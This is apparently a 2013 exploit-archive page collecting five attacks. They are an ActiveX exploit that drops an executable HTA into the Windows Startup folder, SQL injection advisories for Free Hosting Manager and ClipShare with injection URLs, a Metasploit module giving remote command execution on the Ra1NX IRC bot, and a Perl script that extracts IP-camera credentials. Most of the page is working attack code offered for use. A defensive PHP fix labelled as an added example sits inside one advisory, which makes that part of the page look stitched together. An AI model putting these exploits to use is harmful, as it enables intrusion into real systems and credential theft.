Archive for 25 March 2013

LiquidXML Studio 2010 ActiveX Remote 0-day

LiquidXML Studio 2010 ActiveX Remote 0-day Exploit

<html>
<object classid='clsid:E68E401C-7DB0-4F3A-88E1-159882468A79' id='target'/></object>
<script>
var sofa = "..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\the_doctor_is_in.hta";
var king = "Oh noz, Look what Dr_IDE did...<" + "SCRIPT> var x=new ActiveXObject(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>";
target.OpenFile(sofa,1);
target.AppendString(king);
</script>
<body>
LiquidXML Studio 2010 ActiveX Insecure Method Executable File Creation 0-day<br>
By: Dr_IDE<br>
GUID: {E68E401C-7DB0-4F3A-88E1-159882468A79}<br>
Number of Interfaces: 1<br>
Default Interface: _FtpLibrary<br>
RegKey Safe for Script: False<br>
RegkeySafe for Init: False<br>
KillBitSet: False<br>
<br>
<br>
<br>
Been sitting on this one so long it could've hatched twice.
</body>
</html>


Free Hosting Manager V2.0.2 Multiple SQLi

Exploit for the Free Hosting Manager V2.0.2 multiple SQL injection vulnerability

-------------------------------------------------------------------------
# Software      : Free Hosting Manager V2.0.2    Multiple SQLi
# Author        : Saadat Ullah , saadi_linux@rocketmail.com
# Author home   : http://security-geeks.blogspot.com
# Date          : 23/3/13
# Vendor        : http://www.fhm-script.com
# Download Link : http://www.fhm-script.com/download.php
-------------------------------------------------------------------------
--- [ Multiple SQL injection ] ---
The script is vulnerable to SQL injection in several files; some of them are:

http://localhost/Free/clients/reset.php?code=[SQLi]
http://localhost/Free/clients/tickets.php?id=[SQLi]
http://localhost/free/clients/viewaccount.php?id=[SQLi]
Cookie-based injection in
http://localhost/free/clients/home.php
(inject via the cookie value clientuser)
http://localhost/free/clients/register.php ---> SQLi on all POST fields.

Proof of Concept
In home.php
The function auth() is called; this is what it does:

if ((isset($_COOKIE['clientuser'])) && isset($_COOKIE['clientpass']) && isset($_COOKIE['clientid'])) {

$clientuser = $_COOKIE['clientuser'];
$clientpass = $_COOKIE['clientpass'];
$clientid = $_COOKIE['clientid'];
$this->clientuser = $_COOKIE['clientuser'];
$this->clientpass = $_COOKIE['clientpass'];
$this->clientid = $_COOKIE['clientid'];
return true;

$dbquery = @mysql_query("SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'") or die(mysql_error());


In reset.php
http://localhost/Free/clients/reset.php?code=[SQLi]

elseif ((isset($code)) || ($_GET['do'] == "code")) {

$details = mysql_query("SELECT * FROM clientpwactivation WHERE activationcode='$code'")
or die(mysql_error());

In tickets.php
http://localhost/Free/clients/tickets.php?id=[SQLi]
if ((isset($_GET['id'])) && ($_GET['action'] == "close") && ($_GET['confirm'] == "true")) {
$fhm->closeticket($_GET['id']);
.
.
$checkticket = mysql_query("SELECT * FROM tickets WHERE id='$ticket' AND clientid='$this->clientid'") or die(mysql_error());

In viewaccount.php
http://localhost/free/clients/viewaccount.php?id=[SQLi]

$id = $_GET['id'];
.
$getacct = mysql_query("SELECT * FROM orders WHERE id='$id' AND clientid='$fhm->clientid'") or die(mysql_error());

In register.php

$firstname = stripslashes($_POST['first_name']);
$lastname = stripslashes($_POST['last_name']);
$company = stripslashes($_POST['company']);
$address = stripslashes($_POST['address']);
$address2 = stripslashes($_POST['address_2']);
$country = stripslashes($_POST['country']);
$city = stripslashes($_POST['city']);
$state = stripslashes($_POST['state_region']);
$postcode = stripslashes($_POST['postal_code']);
$telnumber = stripslashes($_POST['tel_number']);
$faxnumber = stripslashes($_POST['fax_number']);
$emailaddress = stripslashes($_POST['email_address']);
$username = stripslashes($_POST['username']);
$password1 = stripslashes($_POST['password']);
$password2 = stripslashes($_POST['confirm_password']);
.
.
.
.
.
.
$insertuser = mysql_query("INSERT INTO clients VALUES('', '$username', '$md5pass', '$firstname', '$lastname', '$company', '$address', '$address2', '$city', '$country', '$state', '$postcode', '$telnumber', '$faxnumber', '$emailaddress', '$startingcredits', '1', '', '', '$timestamp') ")

Only stripslashes() is applied to the input, which does not protect against SQL injection.
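The following is an added example, not Free Hosting Manager's own code: it takes the same lookups the advisory quotes from home.php and tickets.php and shows the vulnerable string-building next to a hardened version that validates integer ids up front and binds every value as a parameter through PDO. The same technique fixes the INSERT in register.php (bind each POST field instead of relying on stripslashes(), which only removes backslashes and is not an escaping function). The function names (openDemoDb, authVulnerable, authFixed, loadTicketFixed), the reduced schema and the sample rows are all constructed for the demonstration; the script runs stand-alone against an in-memory SQLite database.

```php
<?php
// Added example (not part of Free Hosting Manager). Constructed schema with only
// the columns the quoted queries touch; runs against an in-memory SQLite database.

function openDemoDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec("CREATE TABLE clients (id INTEGER PRIMARY KEY, username TEXT, password TEXT)");
    $db->exec("CREATE TABLE tickets (id INTEGER PRIMARY KEY, clientid INTEGER, subject TEXT)");
    // Constructed sample data (the md5 hex string stands in for $md5pass on the page).
    $db->exec("INSERT INTO clients VALUES (7, 'alice', 'e99a18c428cb38d5f260853678922e03')");
    $db->exec("INSERT INTO tickets VALUES (1, 7, 'demo'), (2, 8, 'other client')");
    return $db;
}

// Vulnerable pattern from home.php: cookie values are concatenated straight into SQL,
// so the WHERE clause can be rewritten by the client.
function authVulnerable(PDO $db, string $clientid, string $clientuser, string $clientpass): bool {
    $sql = "SELECT * FROM clients WHERE id='$clientid' AND username='$clientuser' AND password='$clientpass'";
    return (bool) $db->query($sql)->fetch();
}

// Hardened: the id must be an integer, and every value travels as a bound parameter,
// so quotes or SQL keywords in the input are compared as literal text.
function authFixed(PDO $db, string $clientid, string $clientuser, string $clientpass): bool {
    $id = filter_var($clientid, FILTER_VALIDATE_INT);
    if ($id === false) {
        return false;
    }
    $stmt = $db->prepare("SELECT * FROM clients WHERE id = :id AND username = :user AND password = :pass");
    $stmt->execute([':id' => $id, ':user' => $clientuser, ':pass' => $clientpass]);
    return (bool) $stmt->fetch();
}

// tickets.php pattern: the ticket id is validated, and the query still scopes the row
// to the authenticated client so one client cannot read another client's ticket.
function loadTicketFixed(PDO $db, string $ticketId, int $clientId): ?array {
    $id = filter_var($ticketId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare("SELECT * FROM tickets WHERE id = ? AND clientid = ?");
    $stmt->execute([$id, $clientId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = openDemoDb();
$tautology = "' OR '1'='1";   // constructed test input for the regression check

var_dump(authVulnerable($db, '7', 'alice', $tautology));                        // bool(true): check bypassed
var_dump(authFixed($db, '7', 'alice', $tautology));                             // bool(false): compared as a literal
var_dump(authFixed($db, '7', 'alice', 'e99a18c428cb38d5f260853678922e03'));     // bool(true): real credentials
var_dump(loadTicketFixed($db, '2', 7));                                         // NULL: belongs to client 8
var_dump(loadTicketFixed($db, "1' OR '1'='1", 7));                              // NULL: rejected before any query
```

The pair of var_dump lines on the tautology input is the regression test a maintainer would keep: the vulnerable function returns true without a valid password, the fixed one does not. Binding parameters also removes the need for the `@` error suppression and `die(mysql_error())` pattern, since PDO raises an exception on malformed SQL instead of leaking the error text to the client.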

#independent Pakistani Security Researcher



ClipShare 4.1.1 (gmembers.php, gid param) – Blind SQL Injection Vulnerability

Exploit for the ClipShare 4.1.1 (gmembers.php, gid param) Blind SQL Injection vulnerability

# Exploit Title: ClipShare 4.1.1 (gmembers.php) Blind SQL Injection Vulnerability
# Exploit Author: Esac
# Vulnerable Software: ClipShare - Video Sharing Community Script 4.1.4
# Official site: http://www.clip-share.com
# Software License: Commercial.
# All versions are vulnerable.
# Note: this vulnerability only works if a group has been added to the community.
# Last Checked: 24 March 2013

# To exploit this vulnerability the MAGIC_QUOTES_GPC directive must be turned off on the server side (php.ini).

==============================================================================================

#Vulnerable Script:
PHP script: gmembers.php, line 23

=========================== BEGIN OF gmembers.php =============================================

<?php
/************************************************************************************************
| Software Name        : ClipShare - Video Sharing Community Script
| Software Author      : Clip-Share.Com / ScriptXperts.Com
| Website              : http://www.clip-share.com
| E-mail               : office@clip-share.com
|**************************************************************************************************
| This source file is subject to the ClipShare End-User License Agreement, available online at:
| http://www.clip-share.com/video-sharing-script-eula.html
| By using this software, you acknowledge having read this Agreement and agree to be bound thereby.
|**************************************************************************************************
| Copyright (c) 2006-2007 Clip-Share.com. All rights reserved.
|**************************************************************************************************/

require('include/config.php');
require('include/function.php');
require('classes/pagination.class.php');
require('language/' .$_SESSION['language']. '/gmembers.lang.php');

$gname  = NULL;
$gurl   = NULL;
$oid    = NULL;
$gid    = ( isset($_REQUEST['gid']) && is_numeric($_REQUEST['gid']) ) ? mysql_real_escape_string($_REQUEST['gid']) : NULL;
$sql    = "SELECT * FROM group_own WHERE GID='" .$gid. "' limit 1";
$rs     = $conn->execute($sql);
if ( $conn->Affected_Rows() == 1 ) {
    $urlkey     = $rs->fields['gurl'];
    $gname      = $rs->fields['gname'];
    $gupload    = $rs->fields['gupload'];
    $oid        = $rs->fields['OID'];
    STemplate::assign('gname', $gname);
    STemplate::assign('gurl', $urlkey);
    STemplate::assign('gupload', $gupload);
} else {
    session_write_close();
    header('Location: ' .$config['BASE_URL']. '/error.php?type=group_missing');
    die();
}
...........................................;
...............................................

?>

============================================================================================================

PoC:

http://server/mavideo/gmembers.php?gid=6 [Blind SQLi]

Real exploitation:

http://server/mavideo/gmembers.php?gid=6 AND 1=1
==> returns the normal page

http://server/mavideo/gmembers.php?gid=6 AND 1=2
==> returns a page with some errors (or nothing at all - a white page)



--------------------------------------------------------------------------------------
PwnEd.
Tested version:
Sunday, March 24, 2013 | Version: 4.1.4 | Username: admin | Logout
Copyright © 2006-2008 ClipShare. All rights reserved.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Greetz : White Tarbouch Team

./Esac

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution

“Ra1NX” PHP Bot pubcall Authentication Bypass Remote Code Execution vulnerability

# Exploit Title: "Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution
# Date: March 24, 2013
# Exploit Author: bwall
# Software Link: https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0
# Version: v2.0
# Tested on: Ubuntu

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => '"Ra1NX" PHP Bot pubcall Authentication Bypass Remote Code Execution',
			'Description'    => %q{
					This module allows remote command execution on the PHP IRC bot Ra1NX by
					using the public call feature in private message to covertly bypass the
					authentication system.
				},
			'Author'         =>
				[
					'bwall <bwall[at]openbwall.com> ' # Ra1NX analysis and Metasploit module
				],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
					['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
					['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
				],
			'Platform'       => [ 'unix', 'win'],
			'Arch'           => ARCH_CMD,
			'Payload'        =>
				{
					'Space'    => 344,
					'BadChars' => '',
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
						}
				},
			'Targets'  =>
				[
					[ 'Ra1NX', { } ]
				],
			'Privileged'     => false,
			'DisclosureDate' => 'March 24 2013',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(6667),
				OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
				OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
				OptString.new('RNICK', [true, 'Nickname of Target IRC Bot', 'jhl1']),
				OptString.new('PHP_EXEC', [true, 'Function used to call payload', 'system'])
			], self.class)
	end

	def check
		connect

		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return Exploit::CheckCode::Unknown
		end
		confirm_string = rand_text_alpha(8)
		response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
		print response
		quit(sock)
		disconnect

		if response =~ /#{confirm_string}/
			return Exploit::CheckCode::Vulnerable
		else
			return Exploit::CheckCode::Safe
		end
	end

	def send_msg(sock, data)
		sock.put(data)
		data = ""
		begin
			read_data = sock.get_once(-1, 1)
			while not read_data.nil?
				data << read_data
				read_data = sock.get_once(-1, 1)
			end
		rescue EOFError
		end
		data
	end

	def register(sock)
		msg = ""

		if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?
			msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"
		end

		if datastore['NICK'].length > 9
			nick = rand_text_alpha(9)
			print_error("The nick is longer than 9 characters, using #{nick}")
		else
			nick = datastore['NICK']
		end

		msg << "NICK #{nick}\r\n"
		msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

		response = send_msg(sock,msg)
		return response
	end

	def ra1nx_command(sock)
		encoded = payload.encoded
		command_msg = "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @#{datastore['PHP_EXEC']} #{encoded}\r\n"
		response = send_msg(sock, command_msg)
		return response
	end

	def quit(sock)
		quit_msg = "QUIT :bye bye\r\n"
		sock.put(quit_msg)
	end

	def exploit
		connect

		print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
		response = register(sock)
		if response =~ /463/ or response =~ /464/
			print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
			return
		end

		print_status("#{rhost}:#{rport} - Exploiting the Ra1NX bot...")
		ra1nx_command(sock)

		quit(sock)
		disconnect
	end
end

StarVedia IPCamera IC502w IC502w v020313 – Username/Password Disclosure

The Perl exploit for the StarVedia IPCamera IC502w v020313 Username/Password Disclosure vulnerability is as follows.

#!/usr/bin/perl
#
#  [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit
#  Author: Todor Donev
#  Email: todor.donev at gmail dot com
#  Type: Hardware
#
#  Thanks to Tsvetelina Emirska the best friend in my life
#  and all my other friends for the help and support which
#  gives me. Kind regards to all of you, who read my lil'
#  exploits.
#  Bulgaria, Sofia
#  03.2013
#
#  Shodanhq r0x 4 teh lulz!!
#  http://www.youtube.com/watch?v=qNyN1AY-YZQ  Cheeerzz =))
#
#  Another bug, hint: you can edit this code and add some lines for remote change the password.
#####

use LWP::Simple;
if (@ARGV == 0) {&usg;}
while (@ARGV > 0) {
$type = shift(@ARGV);
$t = shift(@ARGV);
}
if ($type eq "-d") {
my $r = get("http://$t/cgi-bin/passwd.cgi?") or die(" $t: Not vulnerable, $!\n");
print " [ ] StarVedia IPCamera IC502w IC502w  v020313 remote bypass username/password disclosure exploit\n";
print " [!] Exploiting: $t\n";
if ($r =~ m/<INPUT type=text name=user size=20 maxlength=19 value="(.*)">/g) {
$result .= "   [o] User: $1\n";
}else{die(" Try another exploit, $!");}
if ($r =~ m/<INPUT type=password name=passwd size=20 maxlength=19 value="(.*)">/g){
$result .= "   [o] Password: $1\n";
}else{die("Try another exploit or restart the exploit\n");}
sleep(1);
print " [\\m/] BINGO!!!\n\a".$result;
}
sub usg(){
print " [!] usg: perl $0 [-r or -d] <victim:port>\n";
print " [!]  -d: disclosure password option\n";
print " [!] exp: perl $0 -d 127.0.0.1 :)\n";
exit;
}